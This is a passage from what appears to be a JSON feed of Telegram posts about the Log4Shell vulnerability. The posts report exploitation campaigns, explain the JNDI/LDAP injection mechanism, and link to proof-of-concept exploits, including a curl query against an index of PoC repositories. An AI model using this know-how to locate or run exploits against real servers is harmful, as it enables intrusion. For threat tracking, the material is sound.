\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043f\u043e\u0432\u043b\u0438\u044f\u043b\u043e \u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e. \u041a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0441\u043a\u0430\u043d\u044f\u0442 \u0441\u0435\u0442\u044c \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043d\u0430 LogJam.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043d\u0430 \u043f\u043e\u043c\u043e\u0449\u044c \u043f\u0440\u0438\u0448\u043b\u0438 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b: Cybereason \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0432\u0430\u043a\u0446\u0438\u043d\u0443 Logout4Shell \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f Log4Shell. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 LDAP \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java, \u043f\u043e \u0441\u0443\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 trustURLCodebase \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Log4j. \u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u0435\u0441\u043b\u0438 Logout4Shell \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u0431\u044b\u043b \u0431\u044b \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u044f\u043c, \u043d\u043e, \u0432 \u0431\u043e\u044e \u0432\u0441\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0445\u043e\u0440\u043e\u0448\u0438, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0435\u0433\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u0432.\n \n\u0410 \u0442\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043f\u043e\u043b\u044f\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0434\u044b\u0440\u0443 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0451\u043a.\n \n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Netlab 360, \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0433\u0440\u0443\u0437\u044f\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e Mirai, Muhstik \u0438 Kinsing, \u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0443\u043f\u043d\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0445 DDoS-\u0430\u0442\u0430\u043a. Microsoft 365 Defender Threat Intelligence \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4j \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 Cobalt Strike. \u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0442\u0435, \u043a\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 Log4Shell \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043c\u044f \u0445\u043e\u0441\u0442\u0430, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Log4j, \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 \u0438 \u0434\u0440.\n \n\u041d\u043e, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u043b\u0438\u0432\u043a\u0438 \u0441\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0440\u0430\u043d\u0435\u0435, \u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e 10 \u0434\u0435\u043a\u0430\u0431\u0440\u044f. \u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c Cloudflare \u0435\u0449\u0435 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Cisco Talos, \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e \u0434\u0435\u043a\u0430\u0431\u0440\u044f - \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c\u0441\u044f \u043f\u043e\u0437\u0436\u0435, \u0440\u0430\u0432\u043d\u043e \u0438 \u0442\u043e, \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0441\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441.\n \n\u041d\u0443, \u0430 \u043f\u043e\u043a\u0430, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-13T14:14:52.000000Z"}, {"uuid": "785a2de8-3204-423d-af0f-be3c64eab7c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/mosqua_na_mosque_reke/52012", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @fib_name \u0438 @tass_kgb", "creation_timestamp": "2023-08-12T19:09:56.000000Z"}, {"uuid": "9c2a1e7b-c431-4854-8a04-f01fd48a0630", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/YouPentest/3502", "content": "CVE-2021-44228 : #Log4j (Minecraft) RCE Proof-Of-Concept\nhttps://www.youtube.com/watch?v=KA5Pyd258kw\n\nCVE-2021\u201344228 \u2014 Global Java Exploit \nhttps://gebutcher.medium.com/a74e701df274\n\n#cve #java #exploit #cve2021 #0day #log4j #rce #exploit", "creation_timestamp": "2024-08-04T09:21:45.000000Z"}, {"uuid": "dc95448e-4fff-4517-9cb5-b1fcc6c48ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/YouPentest/3528", "content": "#log4j\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c log4j CVE-2021-44228 \u0438 \u043a\u0430\u043a \u043e\u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f.\n\n\u042f\u0437\u044b\u043a: \u0410\u043d\u0433\u043b\u0438\u0441\u043a\u0438\u0439\n\nhttps://www.youtube.com/watch?v=0-abhd-CLwQ&amp;t=1s\n\n#log4j2 #log4jRCE #log4jRCE  #bugbounty", "creation_timestamp": "2024-07-24T16:08:48.000000Z"}, {"uuid": "d201e13e-6e46-4622-99ba-c626e50a9773", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/365", "content": "\u0415\u0441\u043b\u0438 \u043d\u0443\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 POC \u0434\u043b\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 CVE:\n\n1. \u041f\u0440\u043e\u0441\u0442\u043e \u0441\u043f\u0438\u0441\u043e\u043a CVE \u0438 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 POC'\u0438 \u043a \u043d\u0438\u043c\n2. \u0415\u0449\u0451 \u0435\u0441\u0442\u044c \u0442\u0430\u043a\u043e\u0439 \u043c\u0435\u0442\u043e\u0434: \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 cve_id \u043d\u0443\u0436\u043d\u0443\u044e \u0432\u0430\u043c CVE (\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0430\u0445)\n\ncurl 'https://poc-in-github.motikan2010.net/api/v1/?cve_id=cve-2021-44228' | jq | grep html_url\n\n#exploit #pentest #redteam", "creation_timestamp": "2022-09-30T17:37:06.000000Z"}, {"uuid": "9fe0f31e-8dc0-40f4-86de-b332f8d86419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/bankovsk_zhyznj/215", "content": "4j\n\n\n\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-44228 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Log4j \u044f\u0437\u044b\u043a\u0430 Java. \u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0441 2001 \u0433\u043e\u0434\u0430 \u0432 \u0410\u0440\u0430\u0441he Software Foundation \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043b\u043e\u0433\u043e\u0432. \n \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u0440\u0430\u0439\u043d\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0432\u0432\u0438\u0434\u0443 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u043f\u0440\u0438\u0447\u0438\u043d: \n\u0427\u0440\u0435\u0437\u0432\u044b\u0447\u0430\u0439\u043d\u043e \u0448\u0438\u0440\u043e\u043a\u043e\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u043e\u043d\u0435\u043d\u0438\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u0432 \u044d\u043a\u043e\u0441\u0438\u0441\u0442\u0435\u043c\u0435 Java\n\u041a\u0440\u0430\u0439\u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 (\u0442\u0430\u043a\u0442\u0438\u043a\u0430 \u00abspray and pray\u00bb)\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0443\u0442\u0451\u043c \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043b\u043e\u0433 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432\u0438\u0434\u0430 , \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0435\u0440\u0432\u0435\u0440 LDAP, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a \u0432\u0438\u0434\u0430 \u00abJNDI Injection\u00bb , \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u041f\u043e\u043c\u0438\u043c\u043e \u0441\u0445\u0435\u043c\u044b jndi: ldap: \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 jndi: rmi: \u0438 jndi: dns:   @ehxtrenno_sanct_peterburg\n    \u0422\u0430\u043a\u0436\u0435 \u043f\u043e \u044d\u0442\u043e\u0439 \u0442\u0435\u043c\u0435 \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c https://t.me/khimki_seghodnja/16832", "creation_timestamp": "2021-12-13T11:29:58.000000Z"}, {"uuid": "42efef99-3f4a-4010-89ee-ab284f342744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/monkey_hacker/28", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T07:00:36.000000Z"}, {"uuid": "9fa47729-0d14-4998-b0f1-d642776af214", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/poxek/229", "content": "Merry Christmas!!!\n\n\u0412 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 log4j \u043f\u043e\u0434 Apache \u043d\u043e\u0447\u044c\u044e \u0432\u0434\u0440\u0443\u0433 \u043d\u0430\u0448\u043b\u0430\u0441\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE). \u041a \u044d\u0442\u043e\u043c\u0443 \u0432\u0441\u0435\u043c\u0443 \u0443\u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0439 PoC, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 GitHub.\n\n\u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC \u0443 \u0434\u044b\u0440\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u043e \u0434\u0430\u0436\u0435 CVE (\u0441\u0435\u0439\u0447\u0430\u0441 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c - CVE-2021-44228). \u0418\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043a\u0443\u0447\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 - Steam, iCloud \u0438 \u043f\u0440.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Apache log4j \u0432\u043f\u043b\u043e\u0442\u044c \u0434\u043e 2.14.1. \u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0443\u0436\u0435 \u0438\u0434\u0435\u0442 (\u0441\u0442\u0440\u0430\u043d\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u0436\u0438\u0434\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e PoC).\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043c\u0435\u0440\u044b \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044f \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c log4j \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0-rc1, \u043d\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0447\u0430\u0441\u043e\u0432 \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u0431\u0445\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0435\u043f\u0435\u0440\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0434\u043e 2.15.0-rc2. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, 